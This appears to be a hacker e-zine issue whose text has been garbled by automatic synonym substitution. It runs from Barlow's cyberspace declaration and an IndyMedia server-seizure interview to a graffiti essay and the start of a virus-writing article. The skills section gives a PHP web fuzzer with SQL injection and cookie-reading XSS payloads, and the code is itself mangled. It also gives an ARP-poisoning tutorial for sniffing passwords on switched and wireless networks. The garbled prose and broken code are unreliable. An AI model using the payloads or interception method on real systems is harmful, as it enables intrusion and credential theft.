Jefferson, Washington, Mill, Madison, DeToqueville, and Brandeis. These desires
should now be born anew in us.

You might be afraid of your individual kids, since they're natives in a world the place
you'll at all times be immigrants. Since you concern them, you entrust your
bureaucracies with the parental tasks you're too cowardly to
confront yourselves. In our world, all the emotions and expressions of
humanity, from the debasing to the angelic, are components of a seamless entire, the
world dialog of bits. We can not separate the air that chokes from the air
upon which wings beat.

In China, Germany, France, Russia, Singapore, Italy and america, you
try to beat back the virus of liberty by erecting guard posts on the
frontiers of Our on-line world. These might preserve out the contagion for a small time, however
they won't work in a world that may quickly be blanketed in bit-bearing media.

Your more and more out of date info industries would perpetuate themselves by
proposing legal guidelines, in America and elsewhere, that declare to personal speech itself
all through the world. These legal guidelines would declare concepts to be one other industrial
product, no extra noble than pig iron. In our world, regardless of the human thoughts might
create may be reproduced and distributed infinitely for free of charge. The worldwide
conveyance of thought now not requires your factories to perform.

These more and more hostile and colonial measures place us in the identical place
as these earlier lovers of freedom and self-determination who needed to reject the
authorities of distant, uninformed powers. We should declare our digital selves
proof against your sovereignty, whilst we proceed to consent to your rule over our
our bodies. We are going to unfold ourselves throughout the Planet in order that nobody can arrest our

We are going to create a civilization of the Thoughts in Our on-line world. Could or not it's extra humane
and honest than the world your governments have made earlier than.

John Perry Barlow, Cognitive Dissident
Co-Founder, Digital Frontier Basis
Davos, Switzerland     February 8, 1996

[ uk indymedia interview: hackers defending open publishing systems .......... ]

Activists from HackThisSite.org at down with one of many UK IndyMedia system
directors on the latest DEFCON hacker conference. We interviewed him
relating to the server seizures, how hackers can work to guard open publishing
methods resembling IndyMedia, and the way hackers have gotten extra radicalized and
concerned with social justice struggles. This interview is being streamed as half
of the brand new web site http://www.Hacktivist.web.

Hearken to the interview by way of MP3: http://www.hacktivist.web/radio/ukindymedia.mp3

Jeremy: That is Jeremy from HackThisSite.org and I am sitting within the room with
a number of people who find themselves loosely affiliated with our web site in addition to somebody
who's on the UK IndyMedia undertaking. We have now just a few issues we might like to speak about
like the best way to defend open publishing methods resembling IndyMedia, the best way to configure
our servers in such a manner that makes us much less liable, and the way hackers can play a
extra integral position in defending open publishing methods. Different individuals are going
to introduce themselves proper now:

UK: Hey that is ..... from the UK and I am from UK IndyMedia

Alx: That is Alxciada from HTS

Gary: That is Gary Naham, an activist in Chicago hoping to turning into a hacktivist
devoted to seeing authorities methods that survive and respect the digital
evolution of know-how and never intrude

Jeremy: We have now just a few issues we might like to speak about particularly about how
hackers can play a extra integral position and assist work with varied media
collectives, however we might additionally like afterwards speak basically about IndyMedia, free
speech, open publishing methods, p2p file sharing methods, and the way hackers can
work along with folks to assist strain and alter the regulation. For starters, why
do not you inform us a little bit bit about your self, what kind of work you do, what
teams you're employed with previously, the way you assist out?

UK: A little bit about myself, properly, by day an IT techie, by evening an IT director I
run public web, public web is likely one of the internet hosting factors indymedia uk,
the wiki server, and I kinda acquired concerned when the server seizure occurred about
9-12 months in the past, kinda turned fairly vital to me that we introduced em up as
rapidly as potential as a result of the time we're down, we lose the possibility to inform our
facet of the story so I put up considered one of our servers put a mirror off the publishing
website and we went from there.

Jeremy: Nice. So proper now you are at the moment working as IT director to assist out
with configuring and establishing these servers once they go down?

UK: Yeah that is proper, let me rapidly go over all of the issues I am concerned with.
Primarily I run a server mirroring the UK website. Moreover I arrange rackspace
for among the different indymedia tasks which are at the moment happening. Present in
the method of attempting to safety information with what is going on on on the planet.

Jeremy: I perceive that it is vitally imprecise about what the feds had been wanting
for on these servers and there is some extent of confusion. Are you able to inform us any
particulars about what kind of information or proof they have been in search of and the way they
executed the search?

UK: From my understanding it wasn't really the feds who have been after the server.
My understanding is that it was a results of strain by the Swiss and Italian
authorities regarding earlier protests in Genoa and Niece, I consider these
have been the 2 areas of pursuits. I consider photographs have been revealed which ...
authorities did not like, and yeah, they have been in search of server logs, they have been
in search of IPs, now thankfully, our server does not log IPs!

[Great! What a shame! Too bad!]

Jeremy: I heard the images that have been posted have been undercover police they usually
have been in search of the individuals who initially revealed them?

UK: That is the Swiss connection I consider, nonetheless I believe the Italian
authorities had a extra basic downside with IndyMedia - I met with the home I
marvel if that is what that connection got here from.

Jeremy: How might the Italian authorities strain the British authorities to
execute this raid?

UK: As I perceive it, there is a mutual authorized help treaty with Italy and
the US. Now Rackspace which beforehand hosted the UK server is a US firm
which subsequently falls underneath US jurisdiction to a level. Query not totally
authorized as a result of the servers have been hosted within the UK and rackspace has a authorized entity
within the UK, subsequently, we consider it ought to have gone via due course of within the
UK who ought to have taken the servers - they did not, that is what the road is at
the second.

Jeremy: The internet hosting firm itself gave the server up upon request by western

UK: I consider so, now this is likely one of the fascinating issues, and this ties again
with the place we're at this time. Apparently, the servers weren't really requested, the
logs have been requested, and Rackspace went one step additional. Rackspace successfully
bent over and took it. They handed over the whole server system.

Jeremy: Wow.

Alxciada: In order that they have been initially coming for the logs.

UK: Apparently so, that is what we're listening to, hopefully within the subsequent few days we
ought to hear a little bit extra about it. The EFF put sufficient strain on the US facet
to get the papers.

Alxciada: Was it United States federal brokers that raided the server?

UK: I consider so. I consider it was Rackspace workers that went in took the
servers. The courtroom orders that have been filed have been filed in Texas. The EFF principally
went via that and demanded the papers, and that is at the moment being sorted
out, however hopefully we'll get a transparent image of what they have been after.

Gary: Are there any areas of European or British safety regulation that gives
protection or at the very least an choice of defending in opposition to this?

UK: Oh, sure! Information safety acts alone ought to cowl this type of subject as a result of
they successfully seized a server that hosted shitloads of various stuff. They
have been after one very particular piece of data and within the course of gathering
a number of different shit so I think about there are information safety acts which have bearing
on the case.

Gary: Are there authorized cures obtainable to prosecute and have an effect on authorities if
that is an extrajudicial motion which is what it appears like.

UK: I am unsure if something is going on within the UK as a result of sadly the UK
Europedoesn't have something an EFF at this stage. It is one of many issues that is
being labored on talked about nevertheless it's by no means achieved fruition. Due to this fact we're
relying on a far wider group of people to assist us out.  folks
related to journalism, commerce, privateness, and many others. however there is not any central group
for info privateness having to do with digital

Gary: So European Information Safety legal guidelines are even much less protecting than US safety?

UK: I believe they're as a result of it was the way in which the manuveur was pulled. We
successfully by no means moist via anyplace nearthe UK system. If it went via the
UK system it will be an extended drawn out case there would have been professionals and cons
we'd have had our day in courtroom. However as a result of they went via a backdoor in
the US system - a loophole - it went previous our safety.

Gary: That the British have been completely satisfied to permit?

UK: I do not assume the Brits had an entire lot to do with it. From our
understanding Rackspace workers went into the server room yanked the servers.

Jeremy: They have been initially have been in search of a flat log file and the corporate
simply mentioned "I am not gonna mess with this!" and gave up the whole server?

UK: As I perceive it, sure

Jeremy: And there have been a variety of different varied web sites and collectives on the

UK: Oh sure, there was every thing from linux distros, to numerous indymedias,
private websites - yeah, it hit so much.

Gary: I might assume it is a violation Rackspace's contract with IndyMedia
entities which have signed it?

UK: Sadly the contract was with a single particular person. Sure, there most likely
was a contract violation there, however as I mentioned, as a result of it by no means touched UK
authorities, to tug it via the UK system there could be no level of - the
case would disintegrate. As a result of it was within the US the case there was a precise case
within the US happening, there's a lot simpler to give attention to.

Jeremy: Realizing what  now concerning the company host and the way they have been so
fast to surrender every thing and set again these varied collectives, how would
you configure or construction these servers to make the system as an entire much less

UK: Properly it is very fascinating and truly quite simple. We drew an amazing huge
circle across the greatest weak point: we had one server, we now have twelve.


UK: The content material administration system we use is excellent, it is designed for
mirroring. We have principally taken advatage of the way in which the CMS system was designed
and used it to our benefit. The dynamics are the location are literally finished from
the publish server after which the servers really present the information.

Jeremy: So whenever you really publish one thing to UK IndyMedia it's really
mirrored to different servers everywhere in the world?

UK: And a wide range of totally different working methods. Our private server w3.org is
a Solaris field. Others run debian, freebsd, fedora core - we've a pleasant
contingent of OSs so if a vulnerability breaks out - until it is somethig inside
the publishing system itself - we must always have an inexpensive quantity of resiliance.

Jeremy: This looks as if an ideal instance of how a decentralized mannequin of
content material distribution can defend ourselves from not solely authorized subpoenas as a result of
it creates a aura of paperwork the courts must undergo however defend
ourselves from would-be hackers ...

UK: Sure, positively.

Gary: In an period of extrajudition proceedings the place the authorities assume they
can do something they need and simply current us with details regardless of authorized
protections that clearly exist on this case and have been violated, I believe you might have
to make use of know-how to negate the truth that authorities assume they're above the

UK: Exactly, it isn't the primary case and it isn't the final. There's issues
occurring for the time being, servers taken on a regular basis, it is a rising downside,
indymedia wants to pay attention to that and attempt to survive it.

Jeremy: How are folks inside hacking and programming communities stepped as much as
help the undertaking?

UK: Within the final 3-4 months we began to place collectively as safety staff to go
via every of the servers, every of the code bases, and work for them search for
the weaknesses. I believe traditionally IndyMedia has been fairly lax about that,
extra  with folks having the ability to publish freely and never fairly a lot
concerning the safety of their methods through which the puiblising happens, That is
altering, in a short time.

Jeremy: That brings me again to a few months in the past - there had been two main
vulnerabilities - one occurred throughout the RNC with the cross website scripting
error in dadaIMC - a gaggle calling itself RightWingExtremist.web made use of
this throughout the RNC by altering many indymedia websites to redirect to a website that
mentioned 'indymedia is anti-american' or one thing loopy! [killing communists!]

UK: The system we're utilizing within the UK may be very resiliant, it is java written, the
man's finished an excellent job we have not seen too many issues

Jeremy: Which one are you utilizing?

UK: We're utilizing Mir, it has been fairly responsive.

Jeremy: I consider DadaIMC had had essentially the most issues ..

UK: Yeah, Dada has had a transparent historical past of issues, I agree

Jeremy: A couple of months in the past I had spoken to Spud relating to a vulnerability I
found DadaIMC relating to importing and excecuting PHP information. We privately
notified them of this vulnerability and mentioned, "pay attention we have to preserve this quiet
till every impartial IMC employees is privatley notified and replace it. In fact
it is a huge job and it isn't one thing that'll occur in a single day!

UK: One factor I'll say whereas I've acquired the chance is that there's a
non-public listing for IMC techies. It is a pretty rigorous course of to get in there,
but when anybody finds a difficulty, dump it straight to the individuals who can take care of
it [email protected] is the place to dump in. The technies in
there have an online of belief the place you may't get in until two different folks vouch
for you.

Jeremy: How do you assume right-wing hackers and script kiddies have made use of
the open disclosure coverage of dadaimc?

UK: I am unable to actually speak a lot about that sadly it isn't one thing I've
been concerned with. Actually folks we're working with are going via
dadaimc line by line.

Jeremy: How can hackers play a extra integral position within the growth and
safety of this software program?

UK: I believe the trick is de facto simply to become involved. To get to the purpose of
the place you are a member of the trusted staff takes a little bit bit of labor, however
there's nothing to cease folks..

Jeremy: Yeah, trigger they'll nonetheless simply obtain the supply and simply begin

UK: Yeah, however one factor we do not need occurring this has occurred as soon as already .
We had a man portscanned all 13 of the UK mirrors. Now in a way he discovered
issues we knew about, however alternatively we do not wish to encourage folks to
begin scanning our bins as a result of it generates additional processes - we might be far
happier for folks to work with us and talk with us about what they're
doing this knd of thing- if something so we do not block them.

Jeremy: I had personally put in it on localhost. How can hackers and civil
rights activists collaborate and work collectively with a view to assist strain the regulation
and assist take the battle to the courts?

UK: I believe the largest factor is to get hackers to grasp the problems.
Hackers on the finish of the day do not break issues. It does not take a lot to see
the political ramifactions of their actions. The one time you actually assume speak
it as a neighborhood is when - the cisco case, one thing occurs, one thing get
pulled, somebody shits of their pants, however no person takes the curiosity over an extended
time period foundation. That is irritating and it wants to alter. What the Hack one other con
in Europe proper now, their speak listing is much more encompassing, they spend some
time with different points than safety per say, just like the DMCA, counter-terrorism,
they assume behind the field, and as a hacker neighborhood, all of us want to try this.

Jeremy: I would definitely agree of your critique, particularly of DEFCON, this
appears extra like a white hat drunken social gathering, there's not as a lot educating right here,
solely 10% of the folks listed here are perhaps hackers anyway, everybody else got here right here
for the tradition, the sideshow. How do you assume issues have modified over the
previous few years in gentle of among the new insurance policies and anti-terrorism
laws? How do you assume the hacking neighborhood has modified, develop into extra

UK: I believe the UK and Europe is actually beginning to decide up this. Nonetheless,
not like America the place you might have an enormous nice neighborhood, Europe does not have that,
that is one of many issues that's being labored on proper now, just like the European
structure, declaration of human rights, that type of factor. We have to
concerned. The folks within the floor must get it finished and push it. We have had a
lot of success lately and we have to study from it.. If European hackers can
bond collectively, we are able to cease dangerous laws, however we have to pull collectively. All
too regularly this hasn't occurred.

Jeremy: I am taking a look at previous conventions like Hackers on Planet Earth that
occurred final summer season. It was held in New York Metropolis a month earlier than the Republican
Nationwide Conference, so naturally it was much more politically charged. I
thought it was much more impartial, extra real, speaking about hacker rights
and digital rights and the way we are able to defend methods resembling IndyMedia - I consider
they really had an IndyMedia speech and several other different political speeches...

UK: What the Hack was the identical manner. Italian authorities brokers went in and
sniffed the wire successfully and the ISP advised IndyMedia it was an influence outage.
However yeah, it is certain to occur.

Alxciada: How way back have been your servers really taken?

UK: Attempting to assume, I consider it was final June

Jeremy: What do you concentrate on the raid that occurred a couple of month in the past in

UK: That is even worse and that is a type of issues which are an actual subject.
Indymedia wants to maneuver towards encryption circuits and publishing stuff so that you
cannot tie again to who exactly posted what. The Italian case - my consciousness
that's they did not notice how content material is distributed.

Jeremy: What have been the circumstances behind the Bristol server being seized? Had been
additionally they in search of server logs?

UK: Yeah, that was a case the place a radical collective did some direct motion
destroyed some property and police turned concerned. My understanding is that
somebody from IndyMedia tipped off the police.

Jeremy: In order that they broke concensus with the bigger group, went on to the
police, and that brought about the server as an entire to be seized?

UK: Yeah, and that was hosted in somebody's home as properly, in order that they got here into
their place.

Alxciada: Did they've any mirrors?

UK: They'd one other backup nevertheless it wasn't actively up to date. It is extremely tough
to come up with somebody with the Bristol undertaking. The server was in Texas and
it's tough to really swap over the backups.

Jeremy: The seizure in Bristol occurred a couple of week earlier than the G8

UK: Yeah, Bristol is pretty seperate collective of the UK, they usually hadn't
realized the teachings UK IndyMedia have, which is a disgrace.

Jeremy: What do you need to say to people who find themselves simply starting to get
concerned, simply beginning to perceive these points. What could be essentially the most
efficient approach to educating themselves in addition to plugging in with varied
collectives and people who find themselves concerned to take a extra lively position?

UK: The largest factor is to simply sit down and begin studying IndyMedia, working
out how IndyMedia capabilities, how the worldwide teams resolve issues successfully.
Then come discover us - we're there!

Jeremy: Nice! I assumed this was very productive. The rest you'd wish to

Gary: I would wish to say one factor. Thank YOU for placing your self and your
property in danger for the free change of digital info as a result of your a
hero and also you're placing every thing on the road - there's nothing to say that
they will not be busting down your door subsequent. So I love you for it and extra energy
to you. It takes 100 heros such as you to maintain this motion alive.

UK: There are numerous of us - in locations folks would not anticipate finding us both!

[ misadventures of irish hackers ........................................... C ]

On the first ever Northern Eire Pc Safety Fanatic Conference
(NICSE CON) held within the Europa Resort Belfast noticed the amalgamation of 87 hackers,
14 Pc Science Professors, 19 System Directors, and 4 Police Officers,
All with the frequent purpose to hunt and study new safety Data.

The Con held many actions resembling
Seize The Flag ( Fedora Programs Used)
Hack the Resort ( A profitable bid to take over the Resorts Inner IT system)
The Hammond Information ( An in-depth Dialogue into his scenario)
Hackthissite Ð ( Dialogue into Origins, success's , Failures )
Shows on Bluetooth Hacking
Shows on the Northern Eire Hackers ( Progress, Abilities )

All in all it was a incredible day, nonetheless as most of you DNScon and DEFCON
goers know, the actual stuff does not occur till the con is over and other people begin
to speak.

As I used to be one of many organisers, I used to be getting lots of people coming as much as me
speaking about various things. Nonetheless one man particularly caught my
consideration; he mentioned he was a Police Officer working within the Pc Sides of
issues Ð Forensics, Stings and many others. So I instantly provided him to come back be part of the
different organisers and myself for the standard post-con pint of Guinness.

As traditional the subject of Politics got here up, and clearly his views have been greater than
fascinating as a result of his occupation. Progressively we turned the dialog
round to the IRA (Military sworn to maintain Eire Free from British Troopers and to
create a united Eire). The officer began to speak about his involvement in
sure operations in opposition to the IRA (Strictly of the Document of Course:-P).

One of many operations he solely heard about was the tapping of the Sinn Fein
Workplace (Sinn Fein the political Wing of the IRA). When Sinn Fein left their
workplaces at evening, the Particular Brokers would break into the workplaces and plant tiny
little bugging gadgets so they may hear the Sinn Fein Leaders converse. Not solely
was this not authorised but in addition HIGHLY unlawful.


That is a part of a British MI5/PSNI bugging system discovered hidden within the
floorboards of a Sinn Fein workplace in Belfast in September 2004. Approx 10.5
inches by 6.5 inches.
(At this level I'll inform you that this officer was completely in opposition to all of this
criminal activity from the police, and he knew his penalties of telling us
this info. Nonetheless causes not identified to us, he advised us every thing. For
this, we thanks)

The officer additionally acquired us interested in the present case that he was engaged on at
the time. Operation ÒMirrorÓ Ð This operation referred to as for the officer and a staff
of pc Specialists inside the pressure to implant Key logging Software program onto IRA
suspects in addition to Sinn Fein Politicians. This software program was implanted by
a number of strategies. By discovering computer systems that the Suspects used and truly
loading the software program onto the pc in entrance of them, or the lower than authorized
manner of inserting this software program onto the Suspects and Politicians pc
remotely ( i.e. HACKING).

The officer advised us, that none of this was authorized, and none of this was given
permission from the Chief Constable. Nonetheless the staff have been advised to maintain this a
secret. One other fascinating level was that the information obtained from the suspects
was used to Black Mail the suspects. In addition they discovered Credit score Card numbers and ran
unlawful checks on their purchases.

This says so much concerning the Northern Eire Police Service. That they might be as
low as to carry out unlawful acts with a view to Blackmail and incriminate harmless
folks. Nonetheless this is not simply an remoted case in Northern Eire, its all
over the world.

[ graffiti and counter-culture ........................ the wooster collective ]

The graffiti motion is by its very nature a counter-culture,
anti-establishment mindset that's an alternative choice to the mainstream. It's a
rejection of the established order.

If you resolve that you're going to go up in opposition to the institution, usually all
you might have is your self. The one manner you may survive is to guard your self. If
you do not defend your self, you die. If not actually, then spiritually.
As a result of you have no assets given to you by the mainstream
institution that you just rejected, the one manner you may surviive and defend
your self. The best way you do that is to develop your individual private ethical code that
permits you to survive in a world that's exterior "the norm" It's this code that
drives you. Not cash. Not a home with a white picket fence. Solely your beliefs.
The code is what offers you piece of thoughts when issues get powerful. It is what permits
you to go to jail in your actions after which get proper again on the market to stand up
as soon as once more.

It is the code that stops you from going loopy.
So the place do you develop this code?
You develop it on the streets.
You study it from watching and speaking to others.
However most significantly, you get it from experiencing life.

And that is why graf tradition is so highly effective to individuals who do it. You get to
expertise life to the fullest. You might be really alive, risking what you might have,
rejecting the institution, however dwelling your life the way in which you might have outlined it.
You may have actual, true freedom.

As you expertise life on the road you start to select up experiences like they
have been little scraps of paper. And also you begin to make a collage with the
experiences. You set the entire scraps collectively and it turns into your individual private
cloth that defines who you're.

You might be outlined by actuality, not by tv.
You might be outlined by expertise, not by aspiration.
It is your code and no person elses. And no person can take it away from you.
And now, immediately, you might have a weapon.
The code itself turns into your weapon.

Your life is on the road. And there is an order to it. You understand the place issues
are supposed to be. Issues are the place they need to belong. Adverts go on billboards.
Graffiti goes on partitions and doorways. The 2 co-exist. They conflict, however they know
the place they every must be.

If you happen to're dwelling the lifetime of a real graffiti artist, you are livin' by the code
you might have created for your self.

And what this implies is...

Graffiti should not be in advertisements and advertisements should not be in graffiti.
Graffiti in an advert is an advert. It is not graffiti.
Graffiti finished legally is public artwork sanctioned by the institution. It is not

For graffiti to be graffiti, it needs to be finished illegally.


                                !!!  SKILLS  !!!

[ -----------------------------------------------------------------------------]
[ writing a php fuzzer to self-discover web vulnerabilities .................. ]
[ -----------------------------------------------------------------------------]

Fuzzers are instruments which might audit code and probe methods for generic
vulnerabilities. For the aim of this text, we'll write a number of
capabilities for a PHP script which is able to fuzz the GET parameters of a URL to
set off error codes and uncover potential vulnerabilities. We are going to then discover
prospects of increasing the performance to develop into a broader
all-emcompassing net vulnerability auditing device.

Our net fuzzer works by taking a URL and manipulating every GET variable to make
each potential mixture of requests with an array of malicious characters
designed to generate errors. Take into account the next array which accommodates a big
choice of frequent requests which frequently generate errors and will open scripts
as much as safety holes.

// malicious net requests
$vulnchars[0] = array("%00","%2527percent252esasdf","%u0000",
"%u5c00percentu2700","/","../","./..././","/%2e/", "%2e","%5C","%s", "'","'''''",""",
"%%%%%%","!!!!!!!!!!!!!!!!!!","#", "%5C27","%%5Cpercent56" , "'", "",';',";a", "|",
"?>", "%a0");
// malicious sql requests
$vulnchars[1] = array(" OR 1=1", "' OR '!'='!");
// malicious xss requests
$vulnchars[2] = array("javascript:alert(String.fromCharCode(65,66,67))",
"<script>alert('cookies, yo: ' + doc.cookie);</script>");

We might then make all potential combos of net requests and analyze the
output. Scan the outcomes for an array of frequent error code output and generate a
listing of 'flagged' URLs to be later reviewed for auditing functions. We have now put
collectively the next array which accommodates a listing of frequent net, sql, and xss

$flags[0] = array("<b>warning</b>:", "warning:", "<b>deadly error</b>", "failed
to open stream:", "inner server error", "there was an error when processing
this directive.", "http/1.1 400", "http/1.1 403", "http/1.1 500", "gateway
error", "command not discovered", "file not discovered");
$flags[1] = array("[obdc", "mysql error", "you have an error in your sql
syntax", "odbc drivers error", "[microsoft sql", );
$flags[2] = array("javascript:alert(string.fromcharcode(65,66,67))",
"<script>alert('cookies, yo: ' + doc.cookie);</script>");

Now that we all know what sort of requests to make and what we must be parsing the
output for, we are able to write some PHP code which is able to question the HTTP server for our
requests. On this instance, we're solely making GET requests, however it may be simply
modified ti embrace different HTTP strategies.

operate MakeRequest($url, $technique="GET") 
  $url = str_replace(" ", "%20", $url);
  if ($technique=="GET") 
    $host = substr($url, strpos($url, "://") + 3);$host=substr($host,
0,strpos($host, "/"));
  $request = substr($url, strpos($host, "/"));

  $fp = @fsockopen($host, 80, $errno, $errstr, 10);
  if (!$fp) 
     echo "    ERROR . $url $errstr ($errno)$newline";
     $out  = "GET $request HTTP/1.1rn";
     $out .= "Host: $hostrn";
     $out .= "Connection: Closernrn";
     fwrite($fp, $out);
     whereas (!feof($fp)) 
         $buf.= fgets($fp);
  return $buf;

Now that we are able to get outcomes from the HTTP server for our malicious requests, we
must run it via a operate to scan it for the error codes listed above.
The next operate returns true if the $end result has any matches from the
$flags array.

operate TestResult ($end result) 
  world $flags;
  $end result = strtolower($end result);
  for ($i=0;$i < depend($flags);$i++) 
    for ($o=0;$o < depend($flags);$o++) 
      if (!(strpos($end result, $flags[$i][$o]) === false)) 
        return 1;
  return 0;

Having all of the items we'd like, it is time to write some code to tie every thing
collectively. The next code makes use of the array $lists to include all URLs to probe.
It first parses the URL for all GET parameters to fuzz and begins a loop to check
all potential combos of distinctive URLs. It goes via every GET variable and
tries every malicious character whereas utilizing the default worth of all different GET
parameters. The overall variety of requests must be round N ^ N for every url in
$listing the place N is the variety of GET parameters in every URL). It then MakesRequest
for every distinctive URL and passes the outcomes off to TestResult, asserting if a
match in opposition to one of many error codes from $flag.

    for ($inc=0;$inc<depend($listing);$inc++) {
      if ($localonly == true AND (substr($listing[$inc], 0, 17) !=
"http://localhost/" AND substr($listing[$inc], 0, 17) != ""))
die("Sorry, this script can solely be examined in opposition to localhost.");

      // SetUpParameters parses and shops every GET paramater from a URL into
the array $get and $getvalues
      $url = SetUpParameters($listing[$inc]);
      if (trim($url) != "") {
      echo "$newline$url$newline";
      // undergo every type of vulnerability we're testing
      for ($vulni=0;$vulni<depend($vulnchars);$vulni++) 
        swap ($vulni) 
          case 0: echo "  * Basic net vulnerabilities$newline"; break;
          case 1: echo "  * SQL vulnerabilities$newline"; break;
          case 2: echo "  * XSS vulnerabilities$newline"; break;
        // undergo every GET parameter within the URL
        for ($o=0;$o < depend($get);$o++) 
          for ($i=0;$i<depend($vulnchars[$vulni]);$i++) 
            // generate url from listing of susceptible characters
            $whichparam = $get[$o];
            $testing = $url . "?";
            // put collectively the default values for all the opposite parameters in
the script
            for ($z=0;$z<depend($get);$z++) 
              if ($get[$z] != $whichparam)
            $testing .= "&" . $whichparam . "=" . $vulnchars[$vulni][$i];

            $enjoyable = MakeRequest($testing);
            if ($parseforlinks == true) ParseForLinks($enjoyable);
            $error = TestResult($enjoyable);
            if ($error != 0)
              echo "    FLAG! .. $testing$newline";
              if ($error == 0 and $verbose == true)
                echo "    OK    .. $testing $newline";

This code is the naked necessities to writing an online GET request fuzzer. There are
a great deal of options which might develop this script to be a extra encompassing net
auditing device. For starters, the script may be written to learn the output of a
URL and spider it for added URLs in <a href="http://$host/"> tags to be
added to the $listing array. It will also be expanded to incorporate different strategies
together with POST, SSL, cookies, and file add vulnerabilities. Writing an online
fuzzer is a rewarding programming train the place the probabilities are countless.

[----------------------------------------------------------------------------- ]
[ arp poisoning ................................................. by darkangel ]
[----------------------------------------------------------------------------- ]

This text is supposed to show how ARP works and the way one can go about poisoning
the ARP cache and allow them to utterly sniff site visitors over a switched
community. This text assumes that you have already got entry to a switched
community. ARP Poisoning is a manner of tricking computer systems over a switched community to
ship site visitors via you earlier than going to different computer systems or out to the web.

Tackle Decision Protocol(ARP)
ARP is a dynamic protocol to map a 32bit IP Tackle to a 48bit bodily {hardware}
deal with (MAC Tackle). If one system over a community needs to speak with
one other system over a community, it can first examine if it already is aware of that
methods MAC Tackle and if not it can ship out an ARP broadcast which is able to look
for the {hardware} deal with of the vacation spot system. There are 4 forms of ARP
messages however the principle two are ARP Request and ARP Reply. When a system begins
broadcasting an ARP Message it sends out an ARP Request. An ARP Request is a
message despatched to the printed deal with, the message accommodates the sender's IP
Tackle and MAC Tackle and requests the MAC Tackle of the given IP, after which
it waits for an ARP Reply. An ARP Reply replies to the ARP Request and tells the
pc sending the ARP Request what its MAC Tackle is.

The ARP Cache is a brief storage place that holds a desk with MAC Tackle's
and IP Tackle's. If a pc needs to speak to a different pc and it does not
have already got its MAC deal with saved it can ship an ARP Request. If the Pc
that's sending the ARP Reply doesn't have the requesting computer systems MAC Tackle
it as properly will put it aside to cache. So now each computer systems have the MAC Tackle. A
system can not talk with one other till it has its MAC Tackle.

ARP is a stateless protocol with no authentication in-built so any ARP Reply,
whether or not there was a request or not will replace the ARP Cache on a pc. All
methods will settle for an ARP Reply regardless if there was an ARP Request despatched.

The Change
Media Entry Management (MAC) is a regular addressing system for all Ethernet
gadgets. Most networks use switching gadgets and in a switched community packets
are solely despatched to the port they're destined to in keeping with their vacation spot
MAC Tackle. Switches preserve a desk that associates MAC Tackle's with
sure ports. A swap constructs a route desk by extracting the supply MAC
Tackle from the Ethernet body of every packet processed. If any entry within the
route desk doesn't exist the swap will ahead the packet out all of its

Inside a switched community packets are solely despatched to the vacation spot system making
it, so different gadgets can not see the site visitors.

There are just a few methods to manipulating a community to ship site visitors via you
earlier than sending it to the packets to the vacation spot system. Considered one of these strategies
is known as ARP Poisoning and it's whenever you ship a custom-made ARP Reply
to totally different computer systems throughout the community tricking their computer systems into updating
their ARP cache with new MAC Tackle's (Your MAC Tackle). So now every time
computer1 needs to ship a message to computer2 it will get the MAC deal with of
computer2's IP and sends the message to that MAC deal with. But when that MAC
deal with is modified to your MAC deal with, by poisoning the ARP Cache the message
might be despatched to you as an alternative. After packets are despatched to you, you have to ahead the
packets to the pc it was meant to go within the first place or DoS might be
brought about and the hosts won't be able to speak anymore. One other issue
that you have to weigh in are timeouts, if there is no such thing as a site visitors over the community,
after a timeout interval the ARP cache of the computer systems throughout a community might be
flushed out and you'll need to ship one other constructed ARP reply to the hosts
in order that site visitors is as soon as once more forwarded to you.  One approach to repair that is to
robotically ship ARP Replies each 10 seconds or so to the hosts that you really want
to poison.

Sniffing is the act of capturing packets that are not essentially meant for
public viewings. If you sniff packets throughout a community you may come throughout
many fascinating issues resembling emails, on the spot messages, and even passwords to
e mail accounts and ftp accounts and lots of different forms of passwords which in my
expertise are most of the time, left unencrypted. There are numerous instruments out
there that may robotically scan packets for username and password data. You
can even see what web sites the individual goes to.

If an entry level is related on to a hub or a swap than it leaves the
complete wi-fi community open to ARP Poisoning. Wi-fi web is turning into
increasingly more used and it's laborious to be anyplace that doesn't have a wi-fi
entry level, particularly in properly populated areas. This leaves an enormous safety
danger to most networks as a result of in principle somebody with a laptop computer might go into the
foyer of a enterprise and get on their community by cracking their WEP key or simply
merely connecting if they do not even have WEP. The attacker would then simply want
to poison the ARP Cache of the totally different computer systems throughout the community after which
ahead all site visitors via you. You'd get their passwords and usernames,
the web sites they go to and the rest that you just really feel could be enjoyable to have a look at.

Ettercap http://www.ettercap.sourceforge.web
Permits you to sniff networks and poison the arp and auto redirect site visitors
TCP Dump http://www.tcpdump.org/
A basic objective packet sniffer
Cain&In a position http://www.oxid.it/cain.html
Permits you to sniff networks and poison the arp and redirect site visitors. Doesn't
work over wi-fi and is just for home windows. However may be very usefull for cracking
passwords that you just come throughout
ARPoison http://arpoison.sourceforge.web/
Command line device for UNIX which sends out spoofed packets
Nemesis http://nemesis.sourceforge.web/
An excellent packet injection device
Dsniff, Arp Redirect http://naughty.monkey.org/~dugsong/dsniff/
Will allow you to intercept packets and get passwords and redirect the site visitors, very
good device

[ ars viralis : the viral art .................................. by nomenumbra ]

0) Introduction
       0->1) What's a virus?
       0->2) Kinds of malware?

1) Summary ideas
       1->1) Survival Idea
       1->2) Survival Concept

2) Code Apply
      2->1)  Easy Exe Virii
      2->2)  Batch Virii
      2->3)  Script Virii
      2->4)  Reasonable ExeVirii/Worms
      2->5)  Idea Virii


"And God blessed them, saying, Be fruitful, and multiply, and fill the waters in
the seas, and let fowl multiply within the earth."

From the start of mankind's existence, they have been fascinated with creating
life, one other creature, with a "thoughts" of it is personal, a creature that may flip
itself in opposition to it is grasp. I believe this is likely one of the important the reason why the VX
scene exists. Most viruswriters (together with me) benefit from the challange of making a
small life kind that "lives" on it is personal.

0) Introduction
Properly, sufficient preaching for at this time. Earlier than I begin with technical explainations, I
will first make just a few issues clear to the actually,actually new folks on the market.

0->1) What's a virus?
Properly, a greater query could be, what's malware? As this umbrellaterm covers
rather more than simply virii. Malware is the frequent time period for any undesirable program
in your field. It may be divided in a number of catogories:

I) Virii.
Most individuals assume virii and malware are the identical, however that could be a frequent
misassumption. A virus is (in my view) finest outlined as: "A self-replicating
program that abuses different (host) applications with a view to unfold". A virus at all times
wants a number program, it can not unfold on it is personal, it wants different applications to

II) Worms.

The primary distinction between a worm and a virus are the way in which of replication, a
worm can dwell with out a host, it is like a micro organism, it copies itself and
propagates itself trough many alternative methods. Not like a virus, most worms will not
infect different applications.

III) Trojans.

These sneaky little devils derive their identify from the traditional greek fantasy of the
wood horse of Troje (, with Odysseus inventing a trick to get into the
metropolis and arising with this enormous wood horse which accommodates the greek
